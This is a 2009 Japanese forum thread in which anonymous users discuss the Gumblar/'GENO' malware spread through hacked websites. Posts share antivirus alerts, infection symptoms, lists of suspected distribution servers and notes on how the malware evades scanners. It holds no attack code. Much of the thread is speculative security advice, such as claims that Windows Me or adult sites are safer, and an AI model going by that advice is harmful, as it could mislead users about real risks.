666名無しさん@お腹いっぱい。:2009/05/15(金) 02:12:32
>>662
動画サイトとかFlash多様してるサイトなんかスクリプト許可しなきゃ見れないし
よく見るサイトが感染してたら知らないうちに被害受けるしな
注意してても危ないのに普通のやつなんかもう死んだも同然だろ
667名無しさん@お腹いっぱい。:2009/05/15(金) 02:13:33
>>665
Gumblarさん、マジパネェっす!
668名無しさん@お腹いっぱい。:2009/05/15(金) 02:15:49
>※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
669名無しさん@お腹いっぱい。:2009/05/15(金) 02:16:31
俺は考えるのをやめた
670名無しさん@お腹いっぱい。:2009/05/15(金) 02:19:18
>>666
だよね。
いつも見てるサイトが感染したらと思うとおそろしいわ・・・
671名無しさん@お腹いっぱい。:2009/05/15(金) 02:33:38
>>508
参考にしてみた
thx
672名無しさん@お腹いっぱい。:2009/05/15(金) 02:34:21
GENOウィルスの怖いところはサーバ側で攻撃方法を自由に変えられるところなんだよな

・JavaScriptオフ
  GENOの例を見る限り改竄はリモートから行われている。
  今はJSを介しているがある日突然ダイレクトにembedタグ、objectタグを挿入される可能性がある。
  この場合JSオフでの対応は不可能。

・Adobe Reader、Flash Playerを最新版にする、代替プラグインを使う
  攻撃コードを入れ替えることができるので他のプラグイン、アプリの脆弱性を狙うことも可能。
  最悪の場合ゼロデイを狙われる可能性もある。

・IE以外のブラウザを使う
  Adobe関連の脆弱性はブラウザに依存しない。

・IPまたはドメインでブロック
  攻撃コードを更新していくらでも別のサーバに振り向けることが可能。

・アンチウィルスでの対応
  攻撃ファイルの更新が早く定義ファイルでの対応が追いついてない。
673名無しさん@お腹いっぱい。:2009/05/15(金) 02:35:18
>>666
readerもflashも最新版になってれば被害は防げるそうだけど
flashの方はウェブサイト側で警告出せるみたい(ニコ動は警告出してたような)
readerの方はアップデートしない人多いだろうなあ
674名無しさん@お腹いっぱい。:2009/05/15(金) 02:39:38
GENOにかかるとネットに繋がる時間が長くなるってほんと?


Googleに全然つながらないんだが
675名無しさん@お腹いっぱい。:2009/05/15(金) 02:42:26
Flash Playerを無効にしたらどう?

IEだと切り替え大変だけれど
676名無しさん@お腹いっぱい。:2009/05/15(金) 02:48:20
ネットのインフルエンザはパンデミックだな

てか無自覚で感染してるPC多いんじゃないか?
677名無しさん@お腹いっぱい。:2009/05/15(金) 02:49:11
何か感染したと思ったんだけど
いろんなチェックしてたらIE落ちなくなったわ
でもゲームが反応無しになる、なんだこれ
678名無しさん@お腹いっぱい。:2009/05/15(金) 02:49:27
はんぱねえ
679名無しさん@お腹いっぱい。:2009/05/15(金) 02:51:31
何でGENOってウイルス作ってばら撒いてるのに情報通信規制法で逮捕されないの?
680名無しさん@お腹いっぱい。:2009/05/15(金) 02:58:19
WinMeなんですが、GENOウイルスに感染する危険はありますか?
XPはヤバイと聞きますが・・・
681名無しさん@お腹いっぱい。:2009/05/15(金) 02:59:24
Meの情報ないね どうなの?
682名無しさん@お腹いっぱい。:2009/05/15(金) 03:03:17
これが後に語り継がれるMe最強伝説の始まりである。
683名無しさん@お腹いっぱい。:2009/05/15(金) 03:03:27
親父が頑なにjavaオンのIEを使いたがる
切り替えが楽なプニルや火狐も入れといて説明したのに
684名無しさん@お腹いっぱい。:2009/05/15(金) 03:07:07
>>672
ジャバスクいつも切っていて火狐でネトサフしていたら感染サイトを踏んでしまった
AVAST先生がいかり出したので接続きってブラウザ閉じたらウィルスをチェストに
隔離した方がいいとかいう画面が出てそのまま隔離
チェストをのぞいたら該当サイトのキャッシュが固まっていた
AVASTのスキャンとニフティスキャンをしたら感染0だったがブートスキャンも
しといたほうがいいかな?
685名無しさん@お腹いっぱい。:2009/05/15(金) 03:09:05
JavaScriptオフでも感染!?
686名無しさん@お腹いっぱい。:2009/05/15(金) 03:12:06
>>684
俺、avastでチェストに隔離できなかったんだけど大丈夫かな?
687名無しさん@お腹いっぱい。:2009/05/15(金) 03:17:39
豚どころじゃねえぞ おい
688名無しさん@お腹いっぱい。:2009/05/15(金) 03:18:59
これ対策でAdobe Readerを9に入れ替えたけど、
実は6.0.6を使ってた方が安全だったりする?w
689名無しさん@お腹いっぱい。:2009/05/15(金) 03:19:38
オフにして感染されちゃどうしようもないなぁ
690名無しさん@お腹いっぱい。:2009/05/15(金) 03:23:02
>>684
JavaScriptオフで反応したんであれば、
avastが感染したページに挿入されたコードに反応したのかもしれない。
そうするとブラウザ自体はgumblarのスクリプトを実行してないので、感染はしていない。
いずれにせよ感染ページにどういうコードが仕込まれていたかによる。
JavaScriptが挿入されていたのなら問題はないはず。
691名無しさん@お腹いっぱい。:2009/05/15(金) 03:24:17
はやい話でIEが狙われているのですか?
692名無しさん@お腹いっぱい。:2009/05/15(金) 03:25:25
>>686
他で踏んだ時は警告音と右下に二つほどなんか説明でてすぐ消えた
この時は遮断クリックしたらおkで終わった
今日のは右下に三つくらい説明が出てクリックしたらおkが出て
クリックした後にブラウザ閉じたらチェスト行き画面が出た

因みにフラッシュは最新版だがリーダーは7
でもリーダー嫌いなのでリーダーの設定を起動する時はお伺いを
しろにしてあるので勝手に起動はしていない
693名無しさん@お腹いっぱい。:2009/05/15(金) 03:27:23
>>691

はやい話でそういうこと

しかしこいつのハンパねえところは
IE以外でもヤられる可能性がないわけではないというところだ
694名無しさん@お腹いっぱい。:2009/05/15(金) 03:32:29
>>692
俺も警告音がなって、下に黄色い横長の警告文字が出てきて
すぐにIEを閉じたんだよ

で、その後に、「トロイの木馬」が検出されたってavastのウィンドウが出てきて
「チェストに移動」ってクリックしたのに、エラーになって移動できなかったんだよね

んで、すぐにTemporaryInternetFileの中身を削除して、avastで全ドライブをチェックしたんだけど、
何もウイルスとか出てこなかった・・・

これって、最初の警告音が出てavastが反応した時に、ウイルスサイトにアクセスする前に
防いでくれて、感染しなくて済んだって解釈でいいのかな?
チェストに移動できなかったのは、すぐにブラウザを閉じたから?
695名無しさん@お腹いっぱい。:2009/05/15(金) 03:32:58
感染サイトにアクセスしてしまったよ
Avastがブロックしてくれたよ ママン…

いったいこのウイルスは
どのくらいの規模なのですか?
696名無しさん@お腹いっぱい。:2009/05/15(金) 03:33:19
>>695
チェストに移動できた?
697名無しさん@お腹いっぱい。:2009/05/15(金) 03:34:15
>>690
怖くてソース覗きに行く勇気ありませんw
二回ともジャバスクきった状態で警告された

隔離されているやつの名前はCACHE--002
ファイル名はあてにならないかもしれないがexeじゃなくてCACHEだった
698名無しさん@お腹いっぱい。:2009/05/15(金) 03:37:13
さっき知って飛んできました

みごとに感染してました オワタ
699名無しさん@お腹いっぱい。:2009/05/15(金) 03:38:14
感染したらどうすればいいですか?
700名無しさん@お腹いっぱい。:2009/05/15(金) 03:38:22
感染しているか、していないか確認する方法ってありますかね?
701名無しさん@お腹いっぱい。:2009/05/15(金) 03:40:52
>>700

>>665にあります

感染したらインストールし直すしかないのでしょうか?
702名無しさん@お腹いっぱい。:2009/05/15(金) 03:42:53
>>699

ご愁傷さま

PCのOSクリーンインスコ入れ替えれ
703名無しさん@お腹いっぱい。:2009/05/15(金) 03:43:36
>>697
ソース見れればいろいろわかるんだが…
恐らく挿入されたJavaScriptに反応してるだけだと思うんで大丈夫だと思うけども
まあ気になるならクリーンインストールお勧め
704名無しさん@お腹いっぱい。:2009/05/15(金) 03:44:03
Avastが活躍する話が多いな
Aviraから乗り換えようか悩む
705名無しさん@お腹いっぱい。:2009/05/15(金) 03:44:07
706名無しさん@お腹いっぱい。:2009/05/15(金) 03:45:43
スレを見返したり、まとめ見たり、ググったりすればすぐわかることだと思うけど、
クリーンインストール以外の解決策は今のところないよ
707名無しさん@お腹いっぱい。:2009/05/15(金) 03:46:34
あの今日一日で3つも感染しているホームページを開いてしまいました
TVはインフルエンザよりもこっちを報道するべきじゃないですか
708名無しさん@お腹いっぱい。:2009/05/15(金) 03:50:16
>>701
Meの場合は、どのファイルを見ればいいですか?
709名無しさん@お腹いっぱい。:2009/05/15(金) 03:53:32
Meまだ使ってる人多いのかな?
感染報告ないよね。気になるなぁ
710名無しさん@お腹いっぱい。:2009/05/15(金) 03:55:10
Me使っているくらいなら

感染していても無自覚なんじゃないか?
711名無しさん@お腹いっぱい。:2009/05/15(金) 03:55:24
>>698
何で調べたの?
712名無しさん@お腹いっぱい。:2009/05/15(金) 03:56:01
firefoxの話題が多いようだからさっきfirefox導入して
ieのお気に入りをfirefoxにインポートしたんだけど
そのあとspybotで検査してたらfirefoxに入っていたお気に入り全部がspybotに引っかかったんだけど800個ぐらい
一応元がfirefoxのお気に入りからという事がわかってるからあんまり気にしてないんだけど
今回の件と関係あるかな?
713名無しさん@お腹いっぱい。:2009/05/15(金) 03:58:19
>>711

上に出ていた方法で調べました

どうしよう orz
714名無しさん@お腹いっぱい。:2009/05/15(金) 03:58:26
>>712
spybotスレに似たような報告があったと思うが
誤検出っぽいよ
715名無しさん@お腹いっぱい。:2009/05/15(金) 03:58:28
とりあえず、ウィルスの作者を見つけ出して逮捕してくれ。
以前もこんな感じのことがあったよな。
その時は犯人が逮捕されたけれど。
勿論、外国で外国人が逮捕されたわけだがな。
被害が世界中に及ぶから性質が悪い。
716名無しさん@お腹いっぱい。:2009/05/15(金) 04:00:34
>>591
>本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布:ITpro
>tp://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/

>このプログラムをウイルスだと判定したのは14製品だけだった

この14製品を書かないと記事として片手落ちだろう。つーか知りたい。
多分ノートン先生は失格だろうなあ。
717名無しさん@お腹いっぱい。:2009/05/15(金) 04:00:41
ここまで危険なウイルスっていままでにあった?
知り合いが感染していたよ。
まじやばい。
718名無しさん@お腹いっぱい。:2009/05/15(金) 04:03:33
ニフティのオンラインスキャンしたけど感染してなくてほっとした。
バスター2009いれてて、URLフィルタもフィッシングブロックも有効にしてるけど
XPだから油断できないな…

firefoxでも危険なんだよなコレ?
うかつにネサフできねーじゃん…
719名無しさん@お腹いっぱい。:2009/05/15(金) 04:04:34
>>714
ええ、そうなの?
実は2回に分けて検出されたんだよね
1回目は500個ぐらいで
2回目は300個ぐらい
そんで全部修正して3回目には見つからなくなったけど
何それじゃspybotがfirefoxのお気に入りを誤検出してたということか
thx
720名無しさん@お腹いっぱい。:2009/05/15(金) 04:05:39
感染したかどうかがわからんが
ニコニコみてたら(クリックした時)IEがよく固まるな。

つーか、発見から3ヶ月くらいたってない?
いまだ解決策はおろか、判別法も無しかよw
721名無しさん@お腹いっぱい。:2009/05/15(金) 04:06:19
sqlsodbc.chmはとりあえず改ざんされてない場合の場所に
ファイル名実行できた
AVASTがキャッシュ隔離したしカスペとスパイボットとAVAST
スキャンで感染0だったからもう寝るヽ(`Д´)ノ
722名無しさん@お腹いっぱい。:2009/05/15(金) 04:06:40
>>610
気象庁のレーダーとかアメダスとかな。
Operaとかだとサイト毎に設定できるんだが
今回のは気象庁のサイトだって汚染される可能性もあるしいやはや・・
723名無しさん@お腹いっぱい。:2009/05/15(金) 04:07:04
発見から3ヶ月もたってるのか?これ。

さっきブログではじめて知ったよ。

どこかで報道されていないの?
724名無しさん@お腹いっぱい。:2009/05/15(金) 04:08:15
>>720
genoで見つかったのが4月最初くらいじゃなかったか?だから1ヵ月半くらいだと思う
genoより前から話題になってたらわからんけど
725名無しさん@お腹いっぱい。:2009/05/15(金) 04:08:35
システムの復元は無意味?
726名無しさん@お腹いっぱい。:2009/05/15(金) 04:10:22
>>725

クリンインスコをおすすめ
システムそのものを書き換えます
727名無しさん@お腹いっぱい。:2009/05/15(金) 04:10:42
>>725
感染したんならクリーンインストール以外は意味ないよ
728名無しさん@お腹いっぱい。:2009/05/15(金) 04:10:46
4月に楽天のスレでGENO感染楽天店舗対応最悪で
プチ祭があったけど我が身に這い寄ってくるとは
おもなんだナイアルラトホテプ
729名無しさん@お腹いっぱい。:2009/05/15(金) 04:12:05
>>727
はっきりと感染ってどうやったら判明するのか
明確な基準ないよな
730名無しさん@お腹いっぱい。:2009/05/15(金) 04:13:18
>>724

1ヶ月半なら、もっとニュースになっていてもいいよね?
検索してみても個人のページしか出てこないや
731名無しさん@お腹いっぱい。:2009/05/15(金) 04:15:54
感染したら、クリーンインストールするしかない

って言うけどさ、そもそも感染しているのかどうか判別できないんだけど?
感染の有無を判定する方法って何か無いの?
732名無しさん@お腹いっぱい。:2009/05/15(金) 04:16:02
GENOウイルス大活躍だな、なんでこんなにすごいんだ?
733名無しさん@お腹いっぱい。:2009/05/15(金) 04:16:16
>>718

IEよりはだいぶましだが油断は禁物
734名無しさん@お腹いっぱい。:2009/05/15(金) 04:17:23
>>731

過去スレ、ちゃんと見たか?

完璧な判定方法がないからやべえんだよ、こいつは。
735名無しさん@お腹いっぱい。:2009/05/15(金) 04:17:36
とりあえず、avastでチェックかけたら大丈夫だった
あと、ニフティのオンラインスキャンで大丈夫なら感染してないって判断で良いのかな?
736名無しさん@お腹いっぱい。:2009/05/15(金) 04:20:40
現状だと、セキュリティーソフト入れていても、次々と新種が出てきて対応できない
感じ?

どこのサイトで感染するか分からないという恐ろしい事態だな
(((( ;゚Д゚)))ガクガクブルブル
737名無しさん@お腹いっぱい。:2009/05/15(金) 04:21:01
http://www3.atword.jp/gnome/

こちらを見るとすごおおおおおおおくまずそうなのですが
この予感は当たっていますか?

NTTが感染しているなんて、信じられないのですが
738名無しさん@お腹いっぱい。:2009/05/15(金) 04:22:52
>>736

その通り
こいつは狙いやすい環境(IE)をチェックして感染しているのがたちが悪い
739名無しさん@お腹いっぱい。:2009/05/15(金) 04:24:55
>>736
んな感じ
とりあえず既にいろいろ言われてる対策はしておいたほうがいいとはおもう

>>737
そこはむしろ見ておいたほうが良いと思う。
心配ならまとめページのトップからもリンク張られてるし確認するといい
740名無しさん@お腹いっぱい。:2009/05/15(金) 04:25:07
Adobe Readerってアンインストールしてもいいんですか?
741名無しさん@お腹いっぱい。:2009/05/15(金) 04:25:56
>>740

使わないんならいいんじゃね?

不便だけどさw
742名無しさん@お腹いっぱい。:2009/05/15(金) 04:27:41
>>741
このウィルス知ってから何もかも恐る恐るって感じなんですよ・・・
とりあえず滅多に使わないんで消しときました
レスありがとうございます
743名無しさん@お腹いっぱい。:2009/05/15(金) 04:27:46
ウイルスバスター終わったので寝ます orz

明日みんなに連絡しなくちゃ…

みなさんもお気を付けて
744名無しさん@お腹いっぱい。:2009/05/15(金) 04:29:10
>>717
7年ぐらい前かNimdaの騒ぎは凄かったな。
NHKの7時のニュースでもトップ扱いだったかな。
745名無しさん@お腹いっぱい。:2009/05/15(金) 04:30:27
てかニフティで検索するのに
ニフティ感染してるの????
746名無しさん@お腹いっぱい。:2009/05/15(金) 04:31:09
>>745
( ゚Д゚)

何だと・・・?
747名無しさん@お腹いっぱい。:2009/05/15(金) 04:31:11
>>737
もう一体何が起こってるのかさっぱりなんだが・・・

大塚製薬とSayMoveのほかにNTTまで感染してんの??
748名無しさん@お腹いっぱい。:2009/05/15(金) 04:34:45
>>746
前のレスにも出てるけど
http://www3.atword.jp/gnome/
のサイトにかいてある

SAKURAインターネットさん
 www1722.sakura.ne.jp
 sv172.lolipop.jp
 sv11.chicappa.jp

株式会社 PURENIC JAPAN さん
 p09ns7.puretopure.jp
 
NTTコミュニケーションズさん
 120.29.185.234(VPS-TOKYO2)

ニフティサーブ ネットワーク(ニフティ株式会社さん
 61.121.100.119

の該当データの停止を行ってください。
何度Mail送っても反応無いので・・・・・
749名無しさん@お腹いっぱい。:2009/05/15(金) 04:37:17
>>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz

早く寝てしまいたい…
750名無しさん@お腹いっぱい。:2009/05/15(金) 04:38:08
ニフティにアクセスしたらアウトなの?
751名無しさん@お腹いっぱい。:2009/05/15(金) 04:38:45
ニフティのセキュリティ情報サイトさっき見たばかりなんd
752名無しさん@お腹いっぱい。:2009/05/15(金) 04:39:44
マジでヤバイなこれw
753名無しさん@お腹いっぱい。:2009/05/15(金) 04:39:58
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
754名無しさん@お腹いっぱい。:2009/05/15(金) 04:40:48
けどコマンドプロンプトもレジストリエディタも普通に立ち上がったぞ
IEの挙動もなんともない
CPU使用率もいたって普通
755名無しさん@お腹いっぱい。:2009/05/15(金) 04:41:27
>>196
これって何をスキャンしたの?
ローカルに保存したファイルしかスキャンできないと思っていたんだけど、違うのか?
756名無しさん@お腹いっぱい。:2009/05/15(金) 04:42:09
一気に感染拡大してるじゃん。しばらく安心してネット出来ないなこりゃ
757名無しさん@お腹いっぱい。:2009/05/15(金) 04:44:31
ニフティマジかよスキャンするためにわざわざIEでJS有効にしたのに・・・
758名無しさん@お腹いっぱい。:2009/05/15(金) 04:44:34
専ブラで2ch見るぶんには大丈夫だよね?
759名無しさん@お腹いっぱい。:2009/05/15(金) 04:44:54
avast反応よさそうなのでインスコしたらBeckyでメール受信出来なくなった
アンインスコした
760名無しさん@お腹いっぱい。:2009/05/15(金) 04:45:23
>>754
IEの挙動は元々おかしい(WinMeなので・・・)んだけど、
MS−DOSプロンプトとレジストリエディタは立ち上がった

一応、感染してないってことで良いのかな?
761名無しさん@お腹いっぱい。:2009/05/15(金) 04:45:38
これて桜とかニフティでサーバーかりてる一部の感染じゃないの?
762名無しさん@お腹いっぱい。:2009/05/15(金) 04:48:06
>>754
CPU使用率は元から100%な件・・・
763名無しさん@お腹いっぱい。:2009/05/15(金) 04:48:39
ニフティなんてスキャンするために何度も行ってるが
764名無しさん@お腹いっぱい。:2009/05/15(金) 04:50:17
もう疑心暗鬼になってるなw
よくあるパターンだw
765名無しさん@お腹いっぱい。:2009/05/15(金) 04:52:57
怖くて再起動/シャットダウンできないwww
寝たいよー
766名無しさん@お腹いっぱい。:2009/05/15(金) 04:53:58
ウインドウズアップデートしたら重すぎて怖い
767名無しさん@お腹いっぱい。:2009/05/15(金) 04:54:39
>>765
休止はダメなのか
768名無しさん@お腹いっぱい。:2009/05/15(金) 04:55:19
どうせサイトなんか持ってないし、挙動もおかしくないし、
(感染してるかどうかわかんないけど)騒動落ち着いてからOS入れなおそうかなw
何かもうアホらしくなってきたw
769名無しさん@お腹いっぱい。:2009/05/15(金) 04:57:53
www.nifty.comとはIPアドレスが違うから落ち着け
770名無しさん@お腹いっぱい。:2009/05/15(金) 05:00:09
あやしいURLを開こうとしたらウィルス対策ソフトって警告とか出ますかね
771名無しさん@お腹いっぱい。:2009/05/15(金) 05:00:27
>>765
俺もシャットダウン&再起動できんわw
シャットダウンしたら最後、起動できなくなりそうでw

バックアップも取ってないし、終わったわ・・・
アダルトサイト見ていたわけでもないのに、何でウイルスに出くわすんだよ
772名無しさん@お腹いっぱい。:2009/05/15(金) 05:01:47
>>770
俺はavastでページ開く前に警告出たんだけど、何故かウイルスチェストに移動できなくて
果たして感染防止できたのか、感染してしまったのか判断できずに困ってる・・・
773名無しさん@お腹いっぱい。:2009/05/15(金) 05:02:57
>>772
挙動がおかしくなければ多分大丈夫
774765:2009/05/15(金) 05:03:09
よっしゃ、勇気を出して(ヤケクソで)再起動したけど
またここに戻ってこれたよおおおおおお

>>769ありがとねw
775名無しさん@お腹いっぱい。:2009/05/15(金) 05:03:35
>>772
まずはすぐに確認できるもの(regeditとか)だけ確認してみれば?
776名無しさん@お腹いっぱい。:2009/05/15(金) 05:04:15
>>771
案外アダルトサイトの方がウイルス対策や改竄対策をしっかりやっていて却って安心だったりして。
777名無しさん@お腹いっぱい。:2009/05/15(金) 05:05:08
これって感染したらすぐわかるもんなの?コマンドプロンプトやレジストリエディタなんて、普段はあんまり使わないし
特定のサイトに繋がらない、ブラウザが落ちるっていうのも何も知らない人だったら「ちょっと調子悪いなぁ」くらいにしか思わないんじゃ・・・。
778名無しさん@お腹いっぱい。:2009/05/15(金) 05:06:33
これだけ広まってれば大々的な対策されるのも時間の問題だよな、流石に
そうであってほしい
779名無しさん@お腹いっぱい。:2009/05/15(金) 05:06:45
>>773
Meのせいか、普段から挙動がおかしいので分からんw
>>775
とりあえず、MS−DOSプロンプトとregeditは起動できた
大丈夫なのかな?
>>776
それは言えてるw
意外とアダルトサイトってウイルスいないよねw
780名無しさん@お腹いっぱい。:2009/05/15(金) 05:07:23
>>760
Meってとっくにセキュリティー関連の更新が終わっているんじゃないの?
脆弱性の検査もされずに放置され、トロイとかの餌食になってると思うけど。
持っていないから、詳しくは知らんけど。
781名無しさん@お腹いっぱい。:2009/05/15(金) 05:07:40
Meは今んとこ感染報告ないからのう…
782名無しさん@お腹いっぱい。:2009/05/15(金) 05:09:01
>>780
2,3年前にサービス停止したね
でも、俺のPCはMeがOSなので、仕方が無く使ってるわ・・・
一応、Meでもavast入れていれば大丈夫だよね?
今回も警告出てくれたし
783名無しさん@お腹いっぱい。:2009/05/15(金) 05:09:42
GENOはどこからウィルスもらってきたわけ
784名無しさん@お腹いっぱい。:2009/05/15(金) 05:09:55
>>782
いや例えこのウイルスはブロックできてもそれ以外で問題山積みだから
窓から投げ捨てて安物のネットブックでも買って来い
785名無しさん@お腹いっぱい。:2009/05/15(金) 05:12:17
>>784
今日、電気屋に行って、PC物色して来たよ
OS(XP)がインストール済みのノートで5万5千くらいだったな
786名無しさん@お腹いっぱい。:2009/05/15(金) 05:13:37
Meは古すぎる、つまりネット絡みが貧弱なので
落とされる脆弱性はあっても乗っ取られる要素は2000よりも少ないと何かで読んだことがある。
98SEからXPに移行したクチなのでMeは良く分からないな。
787名無しさん@お腹いっぱい。:2009/05/15(金) 05:15:09
安いPCを探そうと思ったけど通販サイトや情報サイト覗くのが怖い件w
788名無しさん@お腹いっぱい。:2009/05/15(金) 05:16:39
>>782
古いOS 脆弱性
でぐぐったら、トップにこれが出てきた。
熟読した方がいいと思う。
http://blog.hitachi-system.co.jp/01/316.html

詳しくは知らないけど、MEを使ってるのは、AdobeReaderの9.10以前を使っているよりも危険だと思う。
avastがウィルスの侵入を食い止めてくれても、脆弱性をついた攻撃をガードできるわけじゃないはず。
そもそも、セキュリティーメーカー側からしたら、時系列が逆だし。
789名無しさん@お腹いっぱい。:2009/05/15(金) 05:21:27
Windowsが狙われたとは言えmacを使う気になれないのはどうしてだろう。
790名無しさん@お腹いっぱい。:2009/05/15(金) 05:23:22
このウィルスの話題って外じゃ全然でてこないけど
かなりやばくないか
791名無しさん@お腹いっぱい。:2009/05/15(金) 05:27:01
2ch内でもそこまで騒ぎになってないよな
苺きんたまの時とかの方がみんな騒いでた
セキュリティソフトを過信して安心しきってるってことかな
792名無しさん@お腹いっぱい。:2009/05/15(金) 05:27:59
>>790
大きい企業もやられているので圧力が・・・
個人情報も抜かれてるなんて知られた日には初心者はパニックになるよな。
793名無しさん@お腹いっぱい。:2009/05/15(金) 05:32:54
4月の半ばになんかのサイト見ようとリンク押したら警告でたなぁ
もしかしたらこのウィルスかもしれん
794名無しさん@お腹いっぱい。:2009/05/15(金) 05:44:18
アドビのサイト開こうとするとブラウザが固まる
FireFoxならいけたんだけど何でだ
795名無しさん@お腹いっぱい。:2009/05/15(金) 05:47:15
小林製薬のサイトよく見てたから怖くなってきた…
796名無しさん@お腹いっぱい。:2009/05/15(金) 06:58:25
61.121.100.119って
hXXp://homepage.nifty.com/
のサーバーのIPアドレスか?
797名無しさん@お腹いっぱい。:2009/05/15(金) 07:01:28
なるほどwww.nifty.com行っても反応ないのか
798名無しさん@お腹いっぱい。:2009/05/15(金) 07:03:38
見に行ったら表示されないなあ
799名無しさん@お腹いっぱい。:2009/05/15(金) 07:08:42
再起動したけど、とりあえず普通に立ち上がったわ
CPU使用率も問題ないし、regeditも起動できた

感染してないってことでOK?
800名無しさん@お腹いっぱい。:2009/05/15(金) 07:16:39
Nimdaは感染経路がいくつもあったからある意味「責任逃れ」ができたんだけど、
GENOウイルスはサイト管理者のPCが感染→そこからFTPを通してサイトが改ざん→
そのサイトにアクセスすることで感染、と経路(つまり責任)がはっきりしているから
「お前のせいで感染したんだ!どうしてくれる!」「怖いからもうそこでは買わない、
それどころかそのサイトに行きたくもない」と企業や個人の責任問題にされかねない
801名無しさん@お腹いっぱい。:2009/05/15(金) 07:21:05
aguse.jpが全然役に立たない理由が↓見てわかったわ。
http://ilion.blog47.fc2.com/blog-entry-128.html

jscript.dllのバージョンを調べて、本当にIEで表示してるのかを確認してるから、
UAを偽装してアクセスしても検出されないんだ。
スクリプトの難読化パターンも多いし、シグネチャベースの検知はかなり難しいね。
オンラインスキャンもほとんど無意味だし、avast入れておくのがいちばんかも。
とりあえずIEを使わないってだけでも、現時点では効果があるけど、改変版でも
大丈夫かどうかわからないし。
802名無しさん@お腹いっぱい。:2009/05/15(金) 07:22:49
ノートン無反応か・・・早く対応すればいいのに
803名無しさん@お腹いっぱい。:2009/05/15(金) 07:58:08
2009/5/14 22:39 - 小林製薬 (4967) は12日、同社のホームページが何者かによって改ざんされ、
ホームページにアクセスするとウィルスに感染するようになっていたとして、
ウィルス感染が判明したホームページを当面の間、閉鎖したことを発表した。
 同社によると感染が明らかになったホームページは
「暮らしのヒントお知らせ隊(http://hint.kobayashi.co.jp/)」「ハナノアブランドサイト(http://hint.kobayashi.co.jp/hananoa/)」
「イージーファイバーブランドサイト(http://hint.kobayashi.co.jp/easyfiber/) 」の3つ。
 それぞれ、5月9日5時27分から5月11日21日27分までこれらのホームページにアクセスした人は、
ウィルスに感染した可能性があるとして、感染の有無を確認するように呼びかけている。
 ウィルスに感染した場合、sqlsodbc.chmの改変、コマンドプロンプトが起動不能、レジストリエディタが起動不能などの症状が発生するとしている。
 尚、同社ではMacとWindows Vistaに関してはこのウィルスには感染する恐れはないとも述べている。
ttp://www.technobahn.com/cgi-bin/news/read2?f=200905142239
804名無しさん@お腹いっぱい。:2009/05/15(金) 08:00:29
>同社のホームページが何者かによって改ざんされ
805名無しさん@お腹いっぱい。:2009/05/15(金) 08:07:57
aguseは、GENO祭りの真っ最中もまったく役立たずだったな。
何度調べさせてもセフセフ。
806名無しさん@お腹いっぱい。:2009/05/15(金) 08:08:06
GDATA(avast)は対応済みか、、、後常にJSを切ってる人
807名無しさん@お腹いっぱい。:2009/05/15(金) 08:12:09
↑見たらJSあっても無くても感染するのか。
808名無しさん@お腹いっぱい。:2009/05/15(金) 08:14:06
フラッシュプレイヨー10って小数点以下の違いある?
アドビリーダー9.10と9.11みたいな違い。
809名無しさん@お腹いっぱい。:2009/05/15(金) 08:15:49
違いがないのに数だけ増やしてると思ってるの?
810名無しさん@お腹いっぱい。:2009/05/15(金) 08:15:59
>>805
zlkonやgumblarがアクセス制御かけて同じホストからの接続には
しばらく(?)無害になるのでサーバーサイドのチェッカの類はほぼ効かない
(初回は有害判定されるかもしれんけど、たぶんJScript.dllチェックで蹴られておしまい)。
NortonSafeWebもセーフ判定のまま。
811名無しさん@お腹いっぱい。:2009/05/15(金) 08:26:25
>>803
確認して感染が見つかったらどう責任とってくれるんだよwww
812名無しさん@お腹いっぱい。:2009/05/15(金) 08:27:17
>>803
>同社のホームページが何者かによって改ざんされ

813名無しさん@お腹いっぱい。:2009/05/15(金) 08:29:28
GENOにくらべたら対応がいいほう
814名無しさん@お腹いっぱい。:2009/05/15(金) 08:30:48
アンチウィルスのパターンファイルもアテにならないし、ヒューリスティック頼みだな。
そのヒューリスティックもAvast!以外は無力みたいだし、Avast!も亜種すべてに
反応するかわからんし、困ったもんだな。
JavaScriptの埋め込みによるリダイレクトじゃなくて、hrefタグを書き換えるような
形になってしまったらAvast!も反応しないんじゃないかな?
815名無しさん@お腹いっぱい。:2009/05/15(金) 08:30:57
>>809
そうじゃなくて10にも種類があるのか知りたい。
前に10にしたけど知らない間に新しいの出てると困る。
816名無しさん@お腹いっぱい。:2009/05/15(金) 08:33:42
>>815
FLASH バージョン でググって最新版か確認汁
817名無しさん@お腹いっぱい。:2009/05/15(金) 08:34:08
>>815
Acrobat ReaderなりAcrobatなりを立ち上げて、ヘルプメニューの「アップデートの有無をチェック」
してみればいいよ。インストールされているAdobe製品全般のアップデート確認が行われるから。
818名無しさん@お腹いっぱい。:2009/05/15(金) 08:35:54
>>809の突っ込み方はないわなw
819名無しさん@お腹いっぱい。:2009/05/15(金) 08:36:58
>>817
それ、なぜかFlashは対象になってない気がする。Reader、Acrobat、PhotoShop等は
アップデートされるんだけどね。
820名無しさん@お腹いっぱい。:2009/05/15(金) 08:41:05
まぁFlashPlayerはそれ単体で起動するものではなくブラウザから呼ばれる物だからね。
IEならFlash置いてあるサイト管理者がobjectタグにバージョン書いとけばそれ以下ならIEに更新を促される。
821名無しさん@お腹いっぱい。:2009/05/15(金) 08:41:44
何が目的かわからんが、現在の最新版と今自分が使ってる版を確認したければここを開け
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
822名無しさん@お腹いっぱい。:2009/05/15(金) 08:42:49
>>819
Flashはここで見れるよ
823名無しさん@お腹いっぱい。:2009/05/15(金) 08:43:12
>>814
やっぱ、avastって凄いのか?
824822:2009/05/15(金) 08:43:37
825822:2009/05/15(金) 08:44:18
orz  (^^;
826名無しさん@お腹いっぱい。:2009/05/15(金) 08:46:12
有料のノートンとかバスターより無料のavastが凄いとか、どういうことよ?
827名無しさん@お腹いっぱい。:2009/05/15(金) 08:46:18
JAVAスクリプトのソースに、ノートンのオートプロテクトは反応しないのか
828名無しさん@お腹いっぱい。:2009/05/15(金) 08:48:29
>>823
Genoに関してはね。
過剰に反応することも多いし、FWやアンチスパイウェアとも組み合わせなければ
いけないから、PCにあまり詳しくない人には勧めにくいんだよな。
家族が使ってるPCのセキュリティソフト、どうすっかな。
829名無しさん@お腹いっぱい。:2009/05/15(金) 08:48:48
バスターは元々無料のより使えないけどな
830名無しさん@お腹いっぱい。:2009/05/15(金) 08:50:45
>>827
しないね。難読化パターンがいろいろあるし。
